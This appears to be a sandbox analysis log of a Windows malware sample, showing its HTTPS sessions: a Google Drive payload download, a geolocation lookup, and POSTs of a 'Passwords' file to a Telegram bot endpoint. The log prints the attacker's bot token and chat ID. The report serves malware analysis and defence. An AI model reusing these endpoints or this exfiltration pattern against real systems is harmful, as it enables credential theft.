                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Sat, 11 Jan 2025 06:39:42 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: script-src 'nonce-w5Ty9s3vxWYrk8qi3ZZ0Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449896142.250.185.1294437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:39:43 UTC258OUTGET /download?id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8&export=download HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:39:45 UTC4932INHTTP/1.1 200 OK
                                                                                                        X-GUploader-UploadID: AFIdbgRNcrw72R3BKsjiAsEtyBNXHYfpktgeM4-gZJS6YSbkhzxvxO7JIrSzm2MysQPnu9fj
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Security-Policy: sandbox
                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Content-Disposition: attachment; filename="SWsnzGMcBEW4.bin"
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 94272
                                                                                                        Last-Modified: Mon, 09 Dec 2024 08:23:56 GMT
                                                                                                        Date: Sat, 11 Jan 2025 06:39:45 GMT
                                                                                                        Expires: Sat, 11 Jan 2025 06:39:45 GMT
                                                                                                        Cache-Control: private, max-age=0
                                                                                                        X-Goog-Hash: crc32c=3r3qmg==
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close
                                                                                                        2025-01-11 06:39:45 UTC4932INData Raw: ac 94 58 e8 50 9a a4 9b 32 1b bc e1 e7 5e 93 5c ee f9 45 ae 03 14 56 ed 04 78 f8 5d 4e a0 6f 30 c8 50 00 31 a1 20 a4 4f f1 f4 f9 55 42 e9 7d e6 fd 41 6e 08 e5 60 6b b0 bf f7 96 ec 4d 36 1b 1b 46 6a f9 e9 f4 53 ae c7 75 2b b8 de 91 46 f8 60 0e 2d 45 50 45 28 90 e9 c9 13 7e 4e 18 9a 49 79 dc a1 16 ed ce de 24 1a 40 ca de 77 de 30 e9 4a 2d 7a ee 1f 0b 70 78 7f 68 c1 d6 b9 04 fe 71 46 4b 32 65 a4 3a c6 63 4a c4 cf d5 5a 78 4d 01 66 ca 2b e0 c4 ba 4f 45 11 68 8b 50 d3 49 17 91 47 fc b7 69 ed 58 25 f5 8d 03 cf bc 2f 6b 55 96 08 a1 47 a2 b3 1b 5d 7e 32 12 2b 5b de 69 d9 f8 62 dc 06 07 04 8c 6d ae b5 02 a9 ec 40 0c c9 40 65 cc 07 f6 e9 bc 85 45 dd dc 11 b6 40 a4 d0 e1 0e 0c 19 3d 13 37 73 37 13 4c 58 9e 5d 1c 6e d9 b3 7a 59 17 52 86 8e a3 3d a1 df c7 bb a3 fb 22
                                                                                                        Data Ascii: XP2^\EVx]No0P1 OUB}An`kM6FjSu+F`-EPE(~NIy$@w0J-zpxhqFK2e:cJZxMf+OEhPIGiX%/kUG]~2+[ibm@@eE@=7s7LX]nzYR="
                                                                                                        2025-01-11 06:39:45 UTC4834INData Raw: 71 1b 4c 9c 6b 5d f5 aa 27 68 bd ec f2 dc 60 96 fa ce 4a 3d 78 36 94 d1 aa 37 b5 ef ab f1 45 d2 e4 4b c5 78 56 90 e8 54 69 7c 93 31 fd 06 5e 1d 46 32 c0 d0 1f 44 2f 34 d5 23 4c c1 c4 53 ae cd 62 2f b8 f6 3c b9 f8 6a 6b 3a 47 50 45 28 90 e9 f7 0b 7e 4e 1c e8 1f 72 dc d1 00 c5 4f de 24 10 56 34 df 64 db 21 ec 73 36 7b ee 1f 0b 03 f4 7f 68 cb c5 bf 95 f8 0f 58 45 2d db d9 b7 72 6a 8d 8a f9 d4 16 bf 6c 44 08 cc d7 c0 b4 c2 5e 03 63 09 e2 1f 20 28 79 f5 28 99 91 23 19 78 57 8a 91 53 ad d2 7f 07 2c c5 28 ca 47 fb d6 35 5a 5b 7f 36 2b 51 b1 fb d9 f8 68 8c 52 01 76 c4 6b ad c5 cb 8e 99 f1 08 bb d2 6e cc 77 de ae 5c 85 4d b3 44 10 e6 4a a4 c8 f2 0e 0c 15 4e 87 37 73 3d 00 95 cc 99 32 89 4e d9 b9 6b fe 79 c4 86 8e e9 3d df df c7 bb a7 8a b5 5e b9 6d d3 0c a2 8c af
                                                                                                        Data Ascii: qLk]'h`J=x67EKxVTi|1^F2D/4#LSb/<jk:GPE(~NrO$V4d!s6{hXE-rjlD^c (y(#xWS,(G5Z[6+QhRvknw\MDJN7s=2Nky=^m
                                                                                                        2025-01-11 06:39:45 UTC1323INData Raw: 7c 25 4c eb 5a 6e 65 84 a6 4d ef 03 33 c2 49 2d 05 be 74 f3 6e b5 92 8d ef f5 57 61 92 b2 31 6b 8c 36 e1 96 a6 b7 74 69 2b 31 9b ad 8f fb 56 2e 17 0e ea c0 9a bf 7d 5a 3f 63 78 3b e1 99 79 7d 86 42 58 2b ae 08 21 84 fe d7 02 a6 6a 87 69 08 ed 61 19 7a 13 0b fc 88 f6 9e 7b 11 40 8f 6f 4b 9e 0f 2a 6a cc a7 fb d4 72 b6 a7 a7 25 bd 78 36 9e d3 d8 12 c3 ef af 85 16 ac f6 41 ed 28 7e 1b e2 5f 64 6f 48 2c f8 23 7f 18 34 17 c1 d0 1b 66 fc e8 0b 3a 69 e9 f7 51 d5 8f 71 2b bc a0 3d b9 f8 6a 9e 79 45 50 4f 24 98 fa 8f 02 78 62 15 98 32 31 dc a1 12 c5 1d de 24 10 40 ca de 75 a5 7c e9 4a 29 04 bd 1f 0b 7a 50 2b 68 c1 dc b4 8d ed 76 57 42 01 d2 a8 41 3e 6a 87 e1 5f 07 16 b5 66 55 0e a3 72 c0 b4 d3 10 28 63 23 e7 70 b0 0d 79 ff 39 88 95 75 b5 78 57 84 9d 1d a6 d2 0b 51
                                                                                                        Data Ascii: |%LZneM3I-tnWa1k6ti+1V.}Z?cx;y}BX+!jiaz{@oK*jr%x6A(~_doH,#4f:iQq+=jyEPO$xb21$@u|J)zP+hvWBA>j_fUr(c#py9uxWQ
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: 63 84 19 76 8f 23 57 ca 92 f8 f2 bb b2 9e 74 a1 87 92 62 44 d8 c4 a3 28 61 ca b0 f2 2a 6a f6 4b c3 de 5b 07 9a 34 76 7c 3d 9f d5 af 72 1a 45 4e c5 ae 10 4e 2f ec 1a 34 41 a7 f7 53 a4 47 7e 2b b8 da 6e ab fa 48 6b 2d 45 5a 56 2d 81 ec a4 82 a0 41 0a 98 b7 6f d0 a1 16 f6 a1 df 24 1a 4a ca 02 77 f5 32 e9 4a 07 7b fe 1f 0b 72 78 62 68 bb 41 b9 8b fe 71 46 45 36 ef a0 3a 38 69 87 e5 5b d4 16 a4 6c 26 d7 a3 58 ca bf d2 ad 1d 63 09 e7 55 a6 5a b3 ea 28 f8 35 2e 9f 0a b1 95 e3 53 04 f7 17 5d 18 d3 28 bc 8a e3 cf 47 4e 65 38 46 89 57 ca 7a dd e2 ef 1d 43 07 05 e5 7a d3 6b b5 93 93 83 36 df 40 15 a3 d8 f6 e9 56 27 62 cb a9 ce e6 40 ae c4 0d 18 0c 61 52 cc 37 73 3d b1 b7 c5 e1 83 1c 4e d3 c1 9e ee 16 22 e9 51 e3 3d ab 5d e2 a2 dd 27 22 5e b3 15 57 1c dc e7 c0 f9 46
                                                                                                        Data Ascii: cv#WtbD(a*jK[4v|=rENN/4ASG~+nHk-EZV-Ao$Jw2J{rxbhAqFE6:8i[l&XcUZ(5.S](GNe8FWzCzk6@V'b@aR7s=N"Q=]'"^WF
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: a4 d2 0f 3e 16 d4 25 56 3b c8 c7 3b 23 9d 38 36 21 48 d1 78 d7 e9 6c fe 13 1d 04 b0 03 46 b5 b5 99 8e 27 63 26 40 65 c6 14 e6 f8 52 f7 13 c6 d7 60 ce 0e a4 b6 ea 1d 1d 00 2c 0a 44 83 37 13 98 ce 8d 4c 0e 21 28 b3 7a f3 a1 41 95 9f f0 2a 7b e8 11 36 fa f9 22 5f aa 73 d6 17 c9 e5 4d 23 46 45 72 b3 d0 40 b1 4a c0 fd 07 49 ff e7 e3 1a 8b df b4 8c 52 22 5e 6c be 5f cb 42 a4 26 06 b7 1d f2 78 67 86 f4 87 5c cd 7d 1b 8d d6 48 8f f7 9a cf 8d 2d 3a d6 2a b6 d5 49 a8 4c 4b 0f 23 4c 7a 58 c7 49 1f 5b 91 e0 47 ad 56 65 85 fb ca da 5e 29 4d de 57 db 40 74 e4 4c 66 4f a7 3b 0d f5 ac 1a 51 61 47 0f 5f fd 06 50 18 5e c5 15 ea 4d 2a 55 bb d7 7b 43 6e 99 c8 37 7a 1c a3 66 34 95 44 ac 6c db 6b 74 9d 50 82 7e 56 22 63 c5 1e cc 7d 1c 9d 7b 16 04 31 58 17 48 10 d3 88 17 30 2d
                                                                                                        Data Ascii: >%V;;#86!HxlF'c&@eR`,D7L!(zA*{6"_sM#FEr@JIR"^l_B&xg\}H-:*ILK#LzXI[GVe^)MW@tLfO;QaG_P^M*U{Cn7zf4DlktP~V"c}{1XH0-
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: 64 62 dc de 2a 7b a0 ec 66 bf 47 6c 15 e4 b5 c4 50 38 48 cf 4e 38 97 52 1a 3d 58 ff a6 10 06 e8 a9 8b 19 7d 54 13 42 e7 17 51 19 5e cf 12 02 5f 39 4d bc c3 71 d7 6a 54 dc 24 74 0f 84 aa 2a 87 5b 84 db 39 70 7e c5 00 f1 87 5c 31 7f b0 d4 33 7d 6c 84 73 fc 12 43 d0 1e 4e 71 ba 14 eb 30 27 d4 24 4b 22 21 5c f8 aa 56 3c 20 95 a7 a8 8f f2 d1 af 68 5b 93 55 44 1d a4 ee a3 e1 85 6e 4e f1 1b 1a 4d 5b 0f 80 6b 15 64 29 13 49 fb 8b 03 7a 37 a2 d1 b3 20 e2 dd 43 6f 7e 32 60 20 67 f9 cf 5f 90 ad a1 2d 06 f7 16 98 83 b2 c4 de 6f 5a 52 0b c6 8d df ad 97 fa 7b 73 a8 8e 96 c1 1e ef 3e bf 9f 8a 31 b3 f3 11 1f 2a 83 77 8b bd 45 73 40 a1 c1 48 5f d8 33 b9 13 2a 66 09 2a 1e 5f d2 d2 00 52 d1 21 8c d4 68 f4 0e 8d 17 72 5d 5e bf 35 55 11 8f 53 ba fa a3 e3 5f 2a f7 3a 0a 3c 6d
                                                                                                        Data Ascii: db*{fGlP8HN8R=X}TBQ^_9MqjT$t*[9p~\13}lsCNq0'$K"!\V< h[UDnNM[kd)Iz7 Co~2` g_-oZR{s>1*wEs@H_3*f*_R!hr]^5US_*:<m
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: e7 49 91 ad ab 12 06 f7 07 89 94 c1 6c 06 6f 50 4b 74 f7 9d f2 6d 61 a3 6a 7b d7 95 96 c7 37 3b 33 ae 9d f4 27 8a b5 11 70 2b 85 04 56 bd 99 7d c2 c0 a8 c8 54 02 54 00 4c 73 66 0f 0d 05 37 09 c9 11 53 d0 f3 11 bb 65 3d 21 d3 00 73 57 5e b7 35 55 77 f1 67 5d 8a cc 3c 4c 2e 2f 17 27 05 59 c1 53 4f 44 89 37 c0 46 98 28 db 87 f9 d7 5b 56 4b 21 5c 1d 4d a2 55 e4 ac 66 26 33 40 d8 05 73 f0 52 8d ee f0 f3 a7 c0 70 2d 06 d0 b4 9d 40 e5 03 03 8c c6 4d ea ec 97 3a 37 58 f1 e2 20 b9 4f 5e 11 d6 7b 23 8b 46 fe 19 b2 e4 2d 73 84 71 a1 1a 90 df e0 f4 17 6e e6 3d 95 2a 35 10 60 1b 4f 05 e4 ab 5f 36 ec 1b c5 29 d9 c2 ff 80 f3 f4 a5 a9 ef f2 74 90 8f 4a 24 d8 85 67 e1 90 a0 9d 7e 8c 50 49 8f f9 63 3a 76 90 15 87 00 71 b3 e3 23 eb 1c a0 4d 9e 1c 95 1a 0a 6a 6f 81 8f 37 da
                                                                                                        Data Ascii: IloPKtmaj{7;3'p+V}TTLsf7Se=!sW^5Uwg]<L./'YSOD7F([VK!\MUf&3@sRp-@M:7X O^{#F-sqn=*5`O_6)tJ$g~PIc:vq#Mjo7
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: 4d 5f 14 20 56 73 87 7f f7 0e 4c ef 51 7c 94 7a 87 63 bd 74 e0 fe 35 eb e3 52 cc 39 3c 0b 78 06 99 91 f7 a1 48 2f ff e5 c4 3a f9 f3 f4 84 4f dc 0f a3 e7 e9 62 e7 7c 09 24 a8 e0 a3 e8 b8 33 f2 21 8a 43 46 a7 45 63 11 50 83 38 2d 11 75 cb 09 37 ec 1e 2a 79 1f 6c fa c5 1c 94 6a ff d5 45 38 66 f3 f4 aa 7e 6d 89 9d 89 8a 6f f1 07 02 22 65 60 64 5e cc 83 2a d1 3b f4 45 59 96 e3 87 b7 64 11 5e 55 7d 98 db 92 bb 67 3a dd 8d ec 8c 29 a9 35 13 d9 1b 52 ba cf 2a 12 ca b3 35 01 b8 d4 cf eb 83 30 7d 40 99 d4 46 3e 04 cd 58 d1 1a c3 a3 02 1b 6c 7f 53 9c 16 9f 5c 13 2b 1c a8 b8 1d 36 30 fd a3 9d ce 53 2d 5b 69 e6 2d 6e 4b 19 62 1e 18 ce ca 0a fd 12 a1 e7 50 3d fb b8 f6 e7 2f 97 6b ff da c9 f3 65 8c a9 44 68 5c 84 42 a7 e8 e2 4f 84 e4 0a 9a 69 7c 17 c1 50 6c a5 3b d9 8c
                                                                                                        Data Ascii: M_ VsLQ|zct5R9<xH/:Ob|$3!CFEcP8-u7*yljE8f~mo"e`d^*;EYd^U}g:)5R*50}@F>XlS\+60S-[i-nKbP=/keDh\BOi|Pl;
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: d8 92 37 3d e4 32 b5 cb 50 b0 a5 b7 52 cc 0f 6d aa 55 74 a7 55 53 ec b5 9f 51 70 c8 aa 8d d4 cd 3d 07 f4 71 1a fe 81 01 4e 63 85 82 35 5d 08 66 b8 2c d9 90 02 e8 12 db c5 7a 26 ea b9 54 c2 22 e2 b7 0b c9 be 40 4a 3d af 7a 82 b1 76 c3 a8 e8 3c 5b b0 c1 11 d4 69 76 0e 4f 5f 44 f7 3f d9 86 cb b3 06 10 a7 c0 33 b0 99 b0 55 14 ba ef cd 55 26 4b 6f f9 64 e1 94 37 12 6b 29 6d 4f bc c0 6e 22 9d f7 7a c8 b4 3f 67 55 d0 dc 36 d9 38 fe 82 65 d1 50 cb 68 df ab 48 92 6d 9d db 5a 94 96 96 a6 74 c2 24 c6 c2 78 19 7f de c4 6b 0f d9 e2 10 0b 96 68 88 ab e3 fa 08 1e f3 1d 14 37 ca d4 0a 8c 02 db 20 f5 16 18 ad 2f 2b c4 de d5 3d c9 32 51 12 11 f8 82 df 1d a5 3a 28 37 ba 7f 69 83 f3 84 73 8c f6 b1 53 1a 56 5b a8 a7 80 e6 44 78 45 9a bf b5 e0 43 f3 ee c4 65 4f 13 76 95 9e da
                                                                                                        Data Ascii: 7=2PRmUtUSQp=qNc5]f,z&T"@J=zv<[ivO_D?3UU&Kod7k)mOn"z?gU68ePhHmZt$xkh7 /+=2Q:(7isSV[DxECeOv
                                                                                                        2025-01-11 06:39:45 UTC1390INData Raw: 96 a7 45 b3 3c c6 be 79 19 7f ed d7 6b 1e d9 aa 0d 23 4e 02 89 a1 91 d9 2b 1e 83 71 5a 37 cb c5 30 88 04 8f d9 f5 16 21 a6 28 03 82 c0 c9 15 17 41 86 18 63 67 ab d7 1f d7 68 28 47 df a7 69 85 dd 5a 7b e3 2f ba 54 25 07 80 bb a1 90 86 94 40 52 9d b3 bd 9a 08 e8 9c dc 16 9d 63 19 46 b8 d2 0a 38 97 b2 bc 2e d1 eb 30 50 f6 4f ff b4 4b 89 57 a7 f0 6a 89 b5 e0 0e 23 80 9a 85 26 28 f7 7a 08 7f ba 3a 62 52 ec 6b a5 5a 94 32 8b d4 1f 42 e3 d4 0c 92 a5 9d d9 fc d6 2f 93 dd 9b 9c 81 23 78 3a f2 49 be 10 6d 1b 1c 3a 84 09 4e 70 b8 fd 22 13 09 07 aa 30 14 c5 93 5e dc d8 eb 50 15 3c 8d b7 40 fe eb 30 aa 09 3c 0f ac 88 89 36 be 83 82 eb 31 7f cb 98 b2 39 7f 07 30 c3 db a6 bd 61 62 01 df d6 ad 89 ec 7b ff 17 0e cb 9d d6 97 d7 5e 3f 69 5a 2a e6 eb f6 51 84 32 ad fe ae 08
                                                                                                        Data Ascii: E<yk#N+qZ70!(Acgh(GiZ{/T%@RcF8.0POKWj#&(z:bRkZ2B/#x:Im:Np"0^P<@0<6190ab{^?iZ*Q2


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.449932104.21.80.14437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:39:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:39:48 UTC859INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:39:48 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 362
                                                                                                        Connection: close
                                                                                                        Age: 1892377
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        cf-cache-status: HIT
                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X2YcQwp0kUSGmdcJhuqlnHtxGZSX9p3BywCkITJ6fnt3VCUP2Ea%2FE5eq47x%2BAOg%2BjRGDxjGP%2Fwq4Pcuo4AMGzt3dep5Pg7RbL%2BuPOWHFJIWfeICMQBeLy7P4PuBp3OtG4X3VRmAb"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 9002e9691cb37d0e-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1903&min_rtt=1894&rtt_var=730&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1479979&cwnd=244&unsent_bytes=0&cid=d5cd2df64f0b556b&ts=135&x=0"
                                                                                                        2025-01-11 06:39:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.449968149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:39:55 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31e0d8e507c4
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-11 06:39:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 30 64 38 65 35 30 37 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd31e0d8e507c4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-11 06:39:55 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Sat, 11 Jan 2025 06:39:55 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 542
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-11 06:39:55 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 39 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 37 35 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":43963,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736577595,"document":{"file_n


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.449983149.154.167.2204437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:39:57 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd31f9f36ff63c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
